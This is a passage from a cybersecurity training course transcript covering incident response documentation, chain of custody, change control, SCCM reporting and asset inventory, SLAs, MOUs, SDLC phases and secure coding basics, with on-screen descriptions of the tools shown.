so that we can minimize downtime for our IT systems. Network diagrams, of course, always help when
troubleshooting with network-based incidents so that we know the placement of servers, routers, switches,
what they're called, what their IP addresses are, and so on. The configuration for logging on our network
devices is also important. Because, for instance, if we've got log forwarding enabled for all of our Linux hosts
to a centralized monitoring system, then we want to make sure that we go to that centralized monitoring system
when we're looking for log events related to those hosts that are forwarding their events to that system.
There should also be step-by-step procedures included within the incident response plan related to things like
reporting incidents, managing incidents, preservation of evidence, so falling with the chain of custody. And
also there should be listings for escalation triggers. Where at some point, if the incident can't be contained or
handled properly, we may have to call upon a third party to deal with it.
The call list contains incident response team contact information. It will include items such as the Chief
Information Officer's contact info, system administrators for various IT systems, legal counsel, law
enforcement, and perhaps even a public relations or PR officer. In this video, we discussed the incident
response plan.
[Topic title: Incident Documentation. The presenter is Dan Lachance.] In this video, I'll discuss incident
documentation. The SANS Institute online has numerous white papers and templates that deal with all things
of security including incident response. Where an incident response form might deal with things such as the
cause of the incident, how it was discovered, the affected scope, containment and eradication details as well as
recovery details.
Here, on the sans.org website, [The www.sans.org web site is open. In www.sans.org web site, the Sample
Incident Handling Forms web page is open which includes two sections titled Security Incident Forms and
Intellectual Property Incident Handling Forms which further includes various links. The Security Incident
Forms includes Incident Contact List, Incident Identification, Incident Survey, and Incident Containment links.
The Intellectual Property Incident Handling Forms includes Incident Form Checklist and Incident Contacts
links.] we can see numerous Security Incident Forms related to incident handling such as an Incident Contact
list, Incident Identification, Incident Survey, Incident Containment, and so on. So, for example, if I were to
click on the Incident Identification template, it opens up a new web browser tab and opens up a PDF [The
PDF contains two sections. The first section General Information includes various fields such as Name, Date
and Time Detected, Location Incident Detected From, Phone, and Address. The second section Incident
Summary includes various fields such as Site, Site point of Contact, and Phone.] where I would put in
information such as the incident identifier's or detector's information, the date and time the incident was
detected, the location, the contact info, of course, of the person that detected it.
So we can use these as a starting point template. They are freely available on the SANS website to start to get
ourselves organized and have a plan in place with proper documentation. External documentation can come in
the form of a service-level agreement or an SLA. Now this is a contractual document between a consumer of a
service and the provider of that service. So, in the case of an incident response provider, we would have an
SLA with them if we were their customer. So we're are outsourcing incident response.
So, when we outsource, we might outsource some or all incident response issues to a third party. Now we
might do this because of a lack of time internally to properly handle incidents. We might also have a lack of
skilled expertise to deal with certain issues. Also third parties will perhaps offer 24/7 support and follow-up
support as well. So, if you think about an example such as our internal incident response team being able to
handle incidents maybe related to smartphones or desktops...but what about mainframe systems that are
involved in other locations or what about identity federation problems or public cloud issues?
So those are things that our internal technicians might not be able to handle. So therefore, outsourcing can be a
viable solution. The chain of custody, of course, is always important where the preservation of evidence
integrity is number one when it relates to dealing with external incidents and documentation. After incidents
have occurred, documentation must then be once again updated.
The incident response report will include things such as the cause, how the incident was discovered, the scope,
how the issue was resolved. And ideally through lessons learned, we'll then have some more new information
that we can use to update the existing incident response plan. Because the common theme of a lot of this
documentation for security and security controls and response plans is that it's an ongoing task to keep it up to
date.
So why not take the opportunity of having an incident that's already occurred and been dealt with. Then
learning from it, updating the documentation at that point related to that incident. Another part of post-incident
documentation is dealing with incident meetings so we could record meeting minutes. And this should
normally happen only within a few weeks after the incident. The lessons learned, of course, are ideal for future
prevention, useful for training and updating documentation, and can also be very useful for tabletop and mock
exercises so that all involved parties know exactly what to do when an incident occurs. In this video, we talked
about incident documentation.
During this video, you will learn how to protect the integrity of evidence you have collected.
Objectives
protect the integrity of collected evidence
[Topic title: Chain of Custody Form. The presenter is Dan Lachance.] In this video, I'll discuss the chain of
custody form. Chain of custody preserves the integrity of evidence. It provides rules and procedures that are to
be followed to ensure that we can trust the integrity of evidence. It also deals with the evidence gathering in
terms of how it was gathered. Evidence storage – where is it stored; where was it moved to, by whom; what
were the dates and times. And also evidence access – who had access to it, was it signed out, was it transferred
between locations, and so on.
This can affect the admissibility in a court of law. Now, of course, laws will vary from region to region around
the world. But the general concept of chain of custody remains the same. With evidence gathering, we have to
think about first responders. They should always be working only from a copy of digital data. Now this can be
done by taking an image or cloning things like hard disks and storage media instead of working on the original.
Working on the original is always a no-no. Write blocking can also be used to prevent changes to data. Write
blocking usually comes in the form of software these days where, for instance, before we image a hard disk to
be used for evidence, we would install write blocking software to ensure that no changes would be made in
that case to that specific device. So examples of gathering evidence would include issue such as immediately
turning off a suspect mobile phone and removing batteries when it's seized.
Now we would do this to ensure that they can't receive signals from elsewhere to destroy evidence or anything
like that. Faraday bags are used essentially as shielding into which we can place communicating devices so
that they will no longer be able to communicate wirelessly. In some cases, it might be required that we take
photographs of equipment or computer screens in terms of the state they were discovered in. Also we can't
forget other devices like scanners and printers. They could have document history in their logs that could be
relevant in terms of evidence. And, of course, security camera footage can also be very useful.
The storage of evidence has to be accounted for. Now we should be storing certain items that are susceptible to
electronic static discharge or ESD in antistatic bags. Labeling is also crucial in terms of storing evidence and
especially if it's going to be stored for the long term and perhaps called up in the future. A Faraday bag once
again can be used to store evidence. We also must log any movement of that evidence between different
storage locations down to the minute in terms of tracking date and time.
We should also make sure that we keep evidence away from magnetic fields. Some evidence such as that on a
traditional hard disk drive is susceptible to being wiped or data being damaged or destroyed from strong
magnetic fields. Climate controlled storage rooms are normally used to store evidence. We should also
consider the fact that some items, for example, a laptop that might have been seized during an investigation has
internal batteries such as a CMOS battery that is used to store the date and time, but it does run out eventually.
So, whether it is 5 years or 10 years or 12 years, that will eventually no longer supply power to things to keep
track of date and time on that local machine. So we have to keep that in mind as well when it comes to some
electronic equipment. On the screen, you'll see a sample of a chain of custody form. And it includes things
such as a case number – if it's being used in legal proceedings – the offense type for seized equipment, the first
responders identifying information, the suspect's identifier information, date and time, the location the data
was gathered or seized. Now we might also have labeling information and so on and so forth. Now, whenever
this evidence is released or received, so if someone is taking it to use it and someone is pointing it back into
storage, all of this has to be logged with detailed comments. In this video, we discussed the chain of custody
form.
[Topic title: Change Control Processes. The presenter is Dan Lachance.] Change is normally good. But
sometimes, in the IT world, changes can cause more problems than they might solve. In this video, we'll talk
about the change control process. The change control process is a structured approach to IT system change.
Changes then are made in a controlled manner. And changes are all documented. Now, by documenting
anything that changes over time, we are facilitating troubleshooting because if changes are made, for instance,
of the configuration of a network service on a file server and no one has documented that change, only the
person that made the change knows it happened.
And it could change the behavior of how things are presented out on the network. And it could cause problems.
And we don't know that information when we're troubleshooting. It takes much longer to arrive at a resolution.
The change control process is certainly related to remediation where we might change a flawed configuration,
for example, that exposes a vulnerability. So think, for instance, of a network where we might have numerous
Windows computers that have remote desktop enabled.
And we may want to disable it because we either don't need that type of remote control solution or we're using
something else. So, using a change control process, we can go through the proper channels and procedures to
put our setting into effect to disable remote desktop. Posing a change means that we have to have benefits that
will be realized as a result of the change. We have to determine the impact that the change would have on the
network. So, for example, disabling remote desktop would arguably decrease the attack surface unless, of
course, there's another remote control solution being put in its place.
Then, of course, comes the implementation details where we have to deal with the cost, any system downtime
that results from implementing a change. And that doesn't always happen, but it could in some cases. And also
a timeline of where the change could be expected to be fully into effect. So we need to document the change
procedure and the results.
Organizations will normally use either a physical or more often than not a digital change request form that
technicians must fill in and send off for approval. It's a formal document detailing the requested change. And,
after a management approval, then it can proceed. The change log is an audit trail of related activities. And, in
order for a change log to be meaningful, everybody has to be using their own unique user accounts so that
things are tracked and people are therefore accountable.
Part of the change control process also includes monitoring the behavior post change. It's usually not good
enough to implement a change after having gone through the proper procedures and then just saying we're
ready to go. The change is good. There are no negative effects. You need to monitor it. And how long you
should monitor it is up for debate. It depends on the nature of the change and the organization's policies. But
we want to make sure that the change results in improvements and doesn't degrade anything.
Examples of things that are affected by a change control process include the approval of software updates.
Now there's a great example of where normally, yes, software updates improve things, make things more
stable, add new features, remove security holes. But, in some cases, if you've been doing IT for a long time,
I'm sure you'll agree that in some cases when you apply software updates, it can actually break things or make
some things worse.
Another example that is affected by the change control process is certainly the reconfiguration of firewall rules
or encryption of data at rest or perhaps the containerization or partitioning of smartphones so that we separate
personal apps, settings, and data from corporate apps, settings, and data. In this video, we discussed the change
control process.
In this video, you will determine which type of report provides the best data for a specific situation.
Objectives
determine which type of report provides the best data for a specific situation
[Topic title: Types of Reports. The presenter is Dan Lachance.] In this video, we'll talk about different types
of reports.
Reports can come from a variety of sources as related to IT management and security management. And, of
course, having different reports can support decision-making for decision-makers. Now, in some cases, there
might be requirements for report retention. Now, for an instance, we might have to keep report information
related to security breaches for a certain period of time by law. It's always important to be able to authenticate
the data that is used to generate reports. Is it trustworthy?
So often that means that it must be stored and transmitted in an encrypted format and have limited access to it.
Reports can be generated manually. So, for example, we can run an on-demand report perhaps to check to see
how many machines meet a certain security condition or not, and that could be done as needed. But it can also
be automated. So we could have a schedule basis whereby perhaps at the end of every week, a report of the
latest malware infections is sent to the administrative team.
There could also be triggered reports that are triggered by a certain event that occurs. And that might be related
to an intrusion detection or prevention system. And then there is the SIEM option. SIEM stands for security
information and event management. Essentially, it's a centralized monitoring management solution for larger
networks. Standard report types include things such as general user activity either on a single host or over the
network, system downtime, configuration changes, log event correlation to tie events together, helpdesk
tickets, network traffic in and out. And this is just a tiny sampling of standard report types.
Security report types would include things such as privilege use. So, when users are executing their right, for
example, to reboot a server, we might want to track that and then report against that. Unauthorized attempts to
access data; malware detections – always very important; brute-force password attacks; even excessive
network traffic from a host is suspicious and again that might be picked up by your intrusion detection sensors
and you might get a notification as a result. Remember that intrusion prevention differs from detection in that it
can stop a suspicious activity from continuing.
We might also want to report that summarizes incidents that have occurred over certain time frame. Or, if
we've had a security audit conducted, part of that might include a penetration or vulnerability test or scan. So
we might have reports related to that. Again, reports are important because they support decisions. And often
decision-makers are not the IT technicians working in the trenches so to speak. So they need a higher-level
overview. They need to trust that the data is accurate on which they are basing their decisions. And that data
would be used for reports.
Reports can also be subscribed to in various types of solutions either on a scheduled basis for individual
reports that are of interest or perhaps reports could be stored in a file or even sent via e-mail. What you're
seeing on the screen now is Microsoft System Center Configuration Manager 2012 R2. [The System Center
Configuration Manager (Connected to S01 - First Site) window is open. The Search tab is open, it includes
various options such as All Objects, Saved Searches, and Close. The window is divided into two sections. The
first section is the navigation pane which at the bottom left contains four tabs named Assets and Compliance,
Software Library, Monitoring, and Administration. The Assets and Compliance tab is selected by default
which includes various nodes such as Overview, User Collections, and Device Collections. The second section
is the content pane, which displays information regarding the selected tab.] Now this tool allows us to manage
a large amount of devices within the enterprise for change management purposes. But it also includes hundreds
of reports. Let's get to that.
So, in the bottom left, in the navigation area, I'm going to switch over to the Monitoring area. And then, in the
left-hand navigator, I'm going to expand Reporting [He clicks the Monitoring tab which includes various
nodes such as Overview, Reporting, and System Status. He clicks the Reports subnode under Reporting
node.] where I can also expand Reports to see numerous categories of Reports. [The Reports subnode includes
various folders such as Administrative Security, Alerts, and Asset Intelligence.] For instance, I see an Alerts
category where if I select that report folder on the left, I'll see the reports on the right. [In the content
pane.] And, as we keep going further and further down, we're going to see all the different types of reports.
But, of course, we could search for them.
So, if I just click on Reports on the left and then click the Search bar on the right, if I wanted to, I might search
for malware. And here we have some various malware reports that might be of interest, such as Antimalware
activity report. So I could right-click on it, [He right-clicks the Antimalware activity report. As a result, a
flyout appears which includes various options such as Run, Edit, and Create Subscription.] choose to Run the
report. [The Antimalware activity report dialog box appears. In the dialog box, the following Report
Description is highlighted: The report shows an overview of antimalware activity.] Now some reporting
solutions will have parameters, in other words, you have to supply further information on which the report will
run. For example, that might include a date and time range.
Now when we run a report, it might be good on screen. We might be able to print it. We might be able to save
it in a variety of different file formats. So here this Antimalware activity report has a Start Date and an End
Date, so there's a time frame. [The Antimalware activity report has two sections. The first section contains a
text box and two drop-down boxes. And there is also a View Report button adjacent to them. The Collection
Name text box contains a hyperlink named Values adjacent to it. In Start Date drop-down box, 8/19/2016 is
selected by default. And in End Date drop-down box, 8/26/2016 is selected by default. The second section is
blank. He clicks the Values hyperlink. As a result, Parameter Value dialog box opens which contains a Filter
field and below that three options: Collection Name, All Systems, and Windows 7 Devices. At the bottom of the
dialog box are OK and Cancel buttons.] But it also has a collection of devices that it must be based on. So
here I'm going to choose the All Systems collection. I'll click OK. Then I'll click the View Report button. And
then the report results will show up down below. [In the second section of the dialog box.]
Now this is one of those types of reports where no news is good news. We have zero antimalware activity.
That's a good thing. But notice here [At the top of the second section are various tools such as Print, Print
Layout, Page Setup, and Save drop-down list box.] that we've got options to Print. We also have various
options to control the Print Layout and we also can save the report in various file formats, [The Save drop-
down list box includes various options such as PDF, Excel, and Word.] perhaps as a PDF that we would
manually attach to an e-mail and send off to our IT manager and so on. [He closes the Antimalware activity
report dialog box.] But, on the automation side, we can also right-click on a report and we can Create
Subscription to it.
[The Create Subscription Wizard opens. The wizard is divided into two sections. The first section includes
various options such as Subscription Delivery and Summary. The Subscription Delivery option is selected by
default. The second section is the content pane which includes various text boxes and drop-down list
boxes.] Now subscribing to a report means you find that report interesting and you might even want to
schedule how often the report runs and you get a copy. So the report could be delivered in this specific
example to a Windows File Share, or it could be sent through E-mail [In the second section, the Report
delivered by drop-down list box contains two options, Windows File Share and E-mail. He selects the E-mail
option. As a result, various text boxes, drop-down list boxes, and checkboxes appears. The text boxes contains
To, Cc, Bcc, Reply-To, Subject, Comment, and Description. The drop-down list boxes contains Priority in
which Normal is selected by default and Render Format in which XML file with report data is selected by
default. There are two checkboxes named Include Link and Include Report under Description text box. At the
bottom of the wizard are four buttons named Previous, Next, Summary, and Cancel.] to interested parties
where we can include a link to the report or actually include a copy of the report, [He selects the Include
Report checkbox.] for example, here in (Acrobat) PDF format. [He clicks the Render Format drop-down list
box which includes various options such as XML file with report data, Acrobat (PDF) file, and Excel. He
selects Acrobat (PDF) file option.]
So, as we go through with this, we can continue to configure things like the schedule. So I'm just going to put
here [He types [email protected] in the To text box.] [email protected]. This is the e-mail
recipient group. And the Subject is going to be Malware Report. Now, when I click the Next button down at
the bottom, [He clicks the Next button. As a result, Subscription Schedule suboption is selected under the
Subscription Delivery option. There are two radio buttons named Use shared schedule, adjacent to that is a
drop-down box and Create new schedule which is selected by default. The Create new schedule contains radio
buttons such as Hourly, Daily, Weekly, Monthly, and Once. He selects the Weekly radio button which includes
various checkboxes such as Mon, Tues, and Sun. There are two fields to set Start time and Begin on, and a
checkbox named Stop on. The Start time is set to 02:03PM. The Begin on is set to 8/26/2016. The Stop on
checkbox is not selected.] then I can determine what the schedule is going to be – should it run Weekly,
Monthly, and so on.
[Topic title: Service Level Agreement. The presenter is Dan Lachance. The Amazon EC2 SLA web page is
open. The web page is divided into two parts. The first part is the navigation pane which contains PRODUCTS
& SERVICES and RELATED LINKS sections. The PRODUCTS & SERVICES section includes various options
such as Amazon EC2, Pricing, and FAQs. The RELATED LINKS section includes various links such as
Amazon EC2 Dedicated Hosts and Amazon EC2 Spot Instances. The second part is the content pane which is
titled Amazon EC2 Service Level Agreement. It contains various sections such as Last Updated June 1, 2013,
Definitions, Service Commitment, Definitions, Service Commitments and Service Credits, Credit Request and
Payment Procedures, and Amazon EC2 SLA Exclusions.] In this demonstration, we'll take a look at an
example of a Service Level Agreement. The Service Level Agreement or the SLA is a contract between the
provider of a service and a consumer of that same service. Now it doesn't have to exist externally. It could exist
within a larger organization, for instance, for the IT department. They might use it for departmental chargeback
to individual departments that require IT services in a large organization.
But here we're looking at the Amazon Web Services' EC2 Service Level Agreement. EC2 is the platform in the
Amazon Web Services cloud where we can launch virtual machines. Now a Service Level Agreement has a
number of different sections. Let's take a look at this example one. We're always going to be concerned, of
course, with how recent it is, [He refers to the Last Updated June 1, 2013 section.] so any updates we want to
make sure we're aware of. Then we get down to the definition of terms [He scrolls down to the Definition
section.] – in this case – for the Monthly Uptime Percentage and how those numbers are calculated or derived.
Now here [In the Definition section.] Amazon Web Services is talking about Regional Unavailability or
simple just general Unavailability for an Amazon EC2 instance or for its attached disk volumes, which are
EBS volumes. Now they also define the term Service Credit here because what's common with cloud providers
certainly is that if they don't honor or meet the terms in the SLA, one of the consequences from them to the
service consumer – in this context the cloud customer – is service credits given to the customer.
So let's go down and take a look at this a little bit further. So here [In the Service Commitments and Service
Credits section.] we can see the Monthly Uptime Percentage. It says here, if it's Less than 99.95% but equal to
or greater than 99.0%, then we can see the Service Credit Percentage for that specific type of value, which – in
this case - is 10%. Now, if the Monthly Uptime Percentage is less than 99.0%, then Amazon Web Services in
this case is on the hook for a 30% Service Credit Percentage to the customer.
Now it says here that Service Credits are applied against future Amazon – in this case, EC2 or EBS volume
payments. Now what's an important part of an SLA is how these consequences are dealt with. In another
words, how do we redeem these credits if we are the consumer and we don't have at least 99% uptime over the
month. So here it talks about the credit request and payment procedures that must be followed. The general
concepts are going to be the same, whether you're looking at Rackspace in the cloud or Microsoft Azure,
Office 365 or in this case, it happens to be Amazon Web Services.
Then, of course, [He scrolls down to the Amazon EC2 SLA Exclusions section.] there will often be some kind
of listing that excludes certain circumstances from the consequences or from the Service Level Agreement.
Now we don't want to go away thinking that the Service Level Agreement is entirely on the provider. In the
case of cloud computing, it really depends on the specific type of service, for example, infrastructure as a
service, which is what this is classified as. Because we're talking about virtual machines, a lot of the
responsibility at least for the configuration of management is on the consumer. Of course it's running on
provider equipments. So they're responsible to make sure that is up and running. In this video, we took a look
at a sample Service Level Agreement.
After completing this video, you will be able to explain the purpose of a MOU.
Objectives
[Topic title: Memorandum of Understanding. The presenter is Dan Lachance.] Dealing with cybersecurity is
much more than just running the tools and conducting penetration tests. It also includes documentation in the
form of things such as memorandums of understanding. A memorandum of understanding is often referred to
as an MOU. It's an agreement between parties to achieve a common objective. However, it's not legally
binding or enforceable. So therefore, the memorandum of understanding is less formal than a contract or a
service-level agreement. The MOU is written and it will consist of items such as an offer, acceptance, the
intention of the document, and additional considerations between the two parties.
A memorandum of agreement is referred to as an MOA. Now this as opposed to an MOU is legally binding
and enforceable. It's an agreement between parties again to achieve a common objective and it can be verbal or
written. An MOA consists of an offer and acceptance. Now there are many similarities, of course, between
both the memorandum of understanding and the memorandum of agreement. Both of them share a common
objective that both parties strive for. It is a structured approach to meeting shared objectives. And it involves at
least two parties if not more.
The service-level agreement is different. The SLA is a contract between a provider and consumer of a service
where there are things like performance expectations, response times that must be met, and also consequences.
So there could be some kind of a monetary penalty or a credit penalty whereas, for instance, if a cloud provider
doesn't provide the uptime that they promised in the SLA, then the cloud customer gets credits towards the
next month's cloud computing charges. In this video, we discussed a memorandum of understanding.
10. Video: Asset Inventory (it_cscybs_05_enus_10)
In this video, find out how to use existing inventory to drive security-related decisions.
Objectives
[Topic title: Asset Inventory. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
asset inventory.
Organizations can classify many different types of assets including personnel, equipment, IT systems, data,
and so on. Here we're talking about asset inventory for computing devices. And, instead of going around and
gathering that physically and manually, there are many centralized enterprise-class automated ways to gather
inventory.
[The System Center Configuration Manager (Connected to S01 - First Site) window is open. Running along
the top of the page there are three tabs named Home, Collection, and Close. The Collection tab is open by
default, it includes various options such as Add Selected Items, Install Client, and Properties. The window is
divided into two sections. The first section is the navigation pane which at the bottom left contains four tabs
named Assets and Compliance, Software Library, Monitoring, and Administration. The Assets and
Compliance tab is selected by default which includes various nodes such as Overview, Devices, and Device
Collections. The Toronto Devices subnode is selected by default under Devices node. The second section is the
content pane, which contains two subsections.] Here, in Microsoft System Center Configuration Manager or
SCCM, we can go to the Assets and Compliance workspace which I've already clicked on in the bottom left.
On the left, we can then view our Devices. Now here managed devices will be listed under the Client
column [He clicks the Devices node. As a result, a table with column headers titled Icon, Name, Client, Site
Code, and Client Activity is displayed. The column header Name includes various entries such as 192.168.1.1,
CM001, WIN10, and WIN7.] with the value of Yes. For instance, here I've got a WIN10 computer and if I
right-click on it, [He right-clicks the WIN10 and a shortcut menu appears which includes various options such
as Add Selected Items, Start, and Block. He clicks the Start option and a flyout appears which includes
Resource Explorer and Remote Control options.] I can choose Start and I can then click on the Resource
Explorer option to open up an area. [The System Center Configuration Manager - Resource Explorer window
is open. The window is divided into two sections. The first section is contains a node named WIN10 and three
subnodes named Hardware, Hardware History, and Software. The second section is the content pane.] I'll just
maximize that window where I can view any inventory to Hardware related to that specific machine. [He
clicks the Hardware subnode and various Hardwares are displayed in the content pane. And then he expands
the Hardware subnode which further includes various subnodes such as Installed Software, Memory, and
Motherboard.]
So, instead of going to that machine or remote controlling it to find out things, such as Installed Software,
Memory, Motherboard details, and so on, instead I can centrally view it here. Now, not only can I view things
like Hardware inventory, but if it's been configured, I'll also be able to view any Software inventory. [He
clicks the Software subnode which includes various subnodes such as Collected Files and Product Details.
The Product Details contains further subsections named Microsoft Corporation and Microsoft Inc.] Now what
this will show me is any scanned software and categorize it by the company – in this case, Microsoft
Corporation.
But I can also expand the list and view other product details and vendor solutions for software that are installed
on our machine. Now again, this inventory could be very relevant. If I want to deploy a new patch or another
piece of software, it might require that an existing piece of software already be out there. Now, in the same
way, here in the SCCM tool, what I could also do on the left is go to the Monitoring workspace [He clicks the
Monitoring tab which includes various nodes such as Overview, Reporting, and System Status. He clicks the
Reports subnode under Reporting node. The Reports sunode includes various folders such as Hardware -
General and Software - Companies and Products.] where I can then run Reports based on my inventoried
assets.
So, for instance, if we were to scroll down to the hardware section, we would see that we could choose, for
instance, from the Hardware - General category, [He clicks the Hardware - General folder. As a result, a table
is displayed in the content pane with column headers such as Icon, Name, Category, and Date Modified. There
are five rows under the Name column header such as Computer Information for a specific computer and Dan
CustomReport1.] a "Computer information for a specific computer" type of report and we could right-click
and Run the report or Create Subscription to it, for example, if we want this mailed to us automatically on a
periodic basis. So there are other ways to also take a look at our assets in terms of software that has been
inventoried.
So, if I were to go to the Software - Companies and Products folder on the left, I would see numerous reports
over on the right, such as, for instance, the report called "Count inventoried products and versions for a
specific product". Now the other thing about asset inventory, in the case of computing devices in this particular
tool as well, is that under the Assets and Compliance workspace, I could now build a new device collection. So
I'll right-click on the Device Collections link in the left-hand navigator [He right-clicks the Device collection
node. And as a result, shortcut menu appears which includes Create Device Collection and Import Collections
option.] to choose Create Device Collection. [The Create Device Collection Wizard is open. The wizard is
divided into two sections. The first section contains four options such as General, Membership Rules,
Summary, Progress, and Completion. The General option is selected by default. The second section is the
content pane which includes three text boxes such as Name, Comment, and Limiting collection. In the Name
text box, Test is written. The Comment text box is blank. The Limiting collection text box is blank and adjacent
to that is a Browse button. At the bottom of the page are four button named Previous, Next, Summary, and
Cancel.] We're going to call this Test and for the Limiting collection, I'll click Browse and choose All
Systems [The Select Collection dialog box opens. The dialog box has two sections. The first section contains a
drop-down list box in which Device Collections is selected by default and a node named Root which is selected
by default. The second section contains a table with column headers Name and Member Court. The entries
under Name header are All Desktop and Server Clients, All Mobile Devices, All Systems, and All Unknown
Computers. He clicks the All Systems with 7 Member Count. At the bottom of the dialog box are OK and
Cancel buttons. He clicks the OK button.] as a starting point and I'll click Next.
Then, [He clicks the Membership Rules option on the Create Device Collection Wizard. The content pane
includes a table with column headers named Rule Name, Type, and Collection ID. Under the table there is an
Add Rule drop-down list box which includes Direct Rule and Query Rule options. There are two checkboxes
below that named Use incremental updates for this collection and Schedule a full update on this collection.
The Schedule a full update on this collection is checkbox is selected by default.] on the Add Rule button on the
next screen of the wizard, I'm going to choose a Query Rule. And I'm going to call this Query1. And then I'll
choose Edit Query Statement. [He clicks the Query Rule option from the drop-down box. As a result, Query
Rule Properties dialog box appears where in the General tab there are two text boxes and a drop-down box.
In the Name text box, he types Query1. Below that there is an Import Query Statement button. In the Resource
class drop-down box, System Resource is selected by default. Below that there is an Edit Query Statement
button. In the Query Statement text box, Select *from SMS_R_System is written by default. At the bottom of the
dialog box are OK and Cancel buttons. He clicks the Edit Query Statement button. As a result, Query
Statement Properties dialog box opens which contains three tabs named General, Criteria, and Joins.] Now
the point here is that if we've got asset inventory already done in terms of hardware and software for
computing devices, then it really lends itself quite nicely to building collections of computers based on that
gathered inventory. For example, if I were to go to the Criteria tab then click the new criteria button for Simple
value, [The Criterion Properties dialog box opens. In the Criterion Type drop-down list box, Simple value is
selected by default. Below that there is a Where text box which is blank and under that there is a Select button.
The Operator drop-down list box is blank and under that there is a Value text box which is blank and a Value
button. He clicks the Select button.] I'm going to click the Select.
And, if we take a look here [The Select Attribute dialog box is open. The dialog box contains Attribute class,
Alias as, and Attribute drop-down list boxes. He clicks the Attribute class drop-down list box. As a result, a list
appears which includes various classes such as 1394 Controller Extended History, Antimalware Health
Status, AutoStart Software, BitLocker, Desktop Monitor, and Disk Partitions.] at this list of attribute classes,
look at all the different things that we could build a new collection of devices based on – Antimalware Health
Status, any AutoStart Software, whether BitLocker is configured in a certain manner on the machine, we go
further down, even the type of Desktop Monitor that's being run, even the number of Disk Partitions can be
queried, and so on.
So, once we've got asset inventory automated from a central location, it supports decision-making. We can run
reports and it facilitates other IT functions such as building device collections, containing devices that only
have certain characteristics.
Table of Contents
[Topic title: SDLC Phases. The presenter is Dan Lachance.] In this video, I'll talk about the systems
development life cycle. The systems development life cycle is often referred to as the SDLC. It serves as a
framework with multiple phases that are used to manage complex projects. Secure coding practices can also be
followed when developing IT solutions such as those published by OWASP, the Open Web Application
Security Project, or recommendations from the SANS Institute, and also the Center for Internet Security,
which provides system design recommendations, and even benchmarks. Let's take a look at each phase of the
system development life cycle, beginning with project initiation where the business need is clearly defined
since our solution must address it. After which we then take a look at risk assessments, we assemble a project
team, and we think about the type of data that our solution will deal with – whether it be intellectual property,
Personally Identifiable Information or some other kind of corporate data.
We then must consider the stakeholders that will be involved whether directly or indirectly, including software
developers, network administrators, management, end users – which could also be customers – and of course
any third party involvement. Next, we must determine the functional requirements of the solution. So based on
the business need, what must it actually do? Is it going to be a mobile device application? Will the solution be
used on premises or in the cloud or within a certain physical office space? Are there any legal or regulatory
compliance issues that we have to adhere to? We also should consider whether the application needs to be
highly available. For instance, if it's a mission critical application that the business depends on.
Then, at this point, we must define the security requirements such as authentication – so the proving of one's
identity, encryption of data at rest, and data being transmitted. And we must also define any requirements to
prevent data loss. So, in other words, the unintended leakage of data to unauthorized parties. Next, we actually
get into the system design specifications such as exactly how the security requirements will be met as related
to authentication, encryption, and data loss prevention. So at this point, we're starting to get into some detail
related to security controls. Then we get into the development and implementation phase where the solution,
for example, might be built in the cloud since these days public cloud providers offer platforms, databases,
virtual machines that could be spun up very quickly to build and test a product – and then they can be
essentially deprovisioned when no longer needed.
So it's very quick to get this development environment. We're only paying for while we're using it. So it might
make more sense to do that instead of building and developing a solution on premises. Part of development and
implementation is also a peer review. So...to make sure that we followed secure coding practices and so on.
However, security though really needs to be considered through all SDLC phases, not just development and
implementation. In the documentation phase, there are ongoing updates. There's continuous improvement
where we're always assessing our solution to make sure it addresses business needs and that it also addresses
any threats which are ongoing – they're always changing. We can also use documentation for training, for
example, the on-boarding process for new hires.
Lessons learned can also be derived after incidents occur. So really, documentation should apply to all phases
of the SDLC. In the evaluation and testing portion, we should be doing things like enabling verbose logging to
log all application components. We might even then capture network traffic to ensure that what's being
transmitted is what we expect. We might stress test the solution to see how it behaves. Then we would submit
abnormal data as input, and this is often called fuzz testing to see how the application reacts. We want to make
sure that the application doesn't crash or reveal sensitive information as result of the submission of the
abnormal data. And of course, we need end user acceptance for the solution.
In the transitioning to production phase, we have pilot testing, careful observation of the results, and then we
take a look at differences from our production versus our development environment. Despite our best
intentions when testing, sometimes there are variables that just cannot be reproduced in a development or
testing environment. So we have to really observe that in the production environment during the pilot testing.
At the same time, usually what happens is we have to make changes to the documentation, whether it's best
practices for our solution or even core documentation changes based on how it behaves in a production
environment. As with everything, there's ongoing maintenance over time even for the best of solutions, such as
adding user accounts, perhaps making small functional changes as needed, and of course patching problems
that we discover over time. In the end, there is the eventual retirement of our solution. In this video, we
discussed the system development life cycle phases.
[Topic title: Secure Coding. The presenter is Dan Lachance.] In this video, I'll discuss secure coding. One of
the biggest problems with software is the timelines under which developers are under pressure to deliver a
solution. Often, a solution must be put out of the door as quickly as possible. And the problem with this is that
we can't properly apply security techniques if we're always in a rush. So the first thing we should consider then
are best practices related to secure coding, such as those published by OWASP. OWASP is the Open Web
Application Security Project. This is an online resource that has things like secure coding articles,
documentation, and free tools available for developers to use. There's also the SANS Institute which has a
number of whitepapers related to things like secure coding as well as the Center for Internet Security – again
which has a lot of coding system design recommendations as related to security.
But before we can take a look at secure coding best practices, we have to have a clear idea of the security
requirements of the solution that is being built. [The www.sans.org web site opens. The web page includes the
Find Training tab, Live Training tab, Login button, and a search bar. The web page also includes links such
as Secure Authentication on the Internet and Software Engineering - Security as a Process in the SDLC. By
default, in the find result bar, sdlc is written.] Here on the www.sans.org web site, [Dan clicks the down
arrow next to the find result bar and then clicks Software Engineering - Security as a Process in the SDLC
link.] if I were to search for sdlc, the system development life cycle, I can see that there is a Reading Room
document here called Software Engineering – Security as a Process in the SDLC. So, if I were to actually click
on that link and begin reading this documentation, then this would be one of the resources I could use to follow
secure coding practices. And there are many out there on the Internet. [The Software Engineering - Security as
a Process in the SDLC web page opens. The web page includes refresh and download buttons.] So now we
can see the Software Engineering - Security as a Process in the SDLC document loaded here from the SANS
Institute. So this is the type of documentation that we should be going into before we start developing from the
initial phase of the system development life cycle.
[He resumes the explanation of secure coding.] Another invaluable part of secure coding is having a peer
review. This essentially is having other sets of eyes reviewing code looking for improper secure coding
practices or flaws in the logic with the code. So therefore, security must be a part of each and every SDLC
phase. A big part of secure coding involves input validation to make sure that the data being fed into an
application is what is expected. We want to make sure that we allocate enough memory to account for valid
data being input. And then, if we're expecting something like a date of birth, we make sure that only dates are
entered into that field before it's processed. We also want to make sure with input validation that we don't
allow executable code to be submitted, for example, on a Web Form field.
So this is all part of our security requirements definition when we build our solution. As an example of a
problem, with secure coding consider the Heartbleed bug which was an SSL/TLS bug. This was an OpenSSL
vulnerability specifically that allowed access to data that would normally be secured with SSL and TLS.
